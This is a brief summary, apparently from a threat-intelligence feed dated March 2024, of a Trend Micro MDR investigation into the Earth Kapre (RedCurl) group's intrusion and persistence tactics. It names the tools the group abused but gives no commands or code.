Unveiling Earth Kapre aka RedCurl’s Cyberespionage Tactics With Trend Micro MDR, Threat Intelligence
released on 2024-03-11 @ 10:52:09 AM
This report examines an investigation by the Trend Micro MDR team that uncovered intrusion tactics used by the threat actor group Earth Kapre in a recent incident. The investigation found Earth Kapre abusing legitimate tools like PowerShell, curl, and pcalua.exe to evade detection while compromising systems. The threat actor established persistence via scheduled tasks and used Python scripts and Impacket for command execution. Threat intelligence analysis attributed the attack to Earth Kapre based on infrastructure links and code similarities with known samples.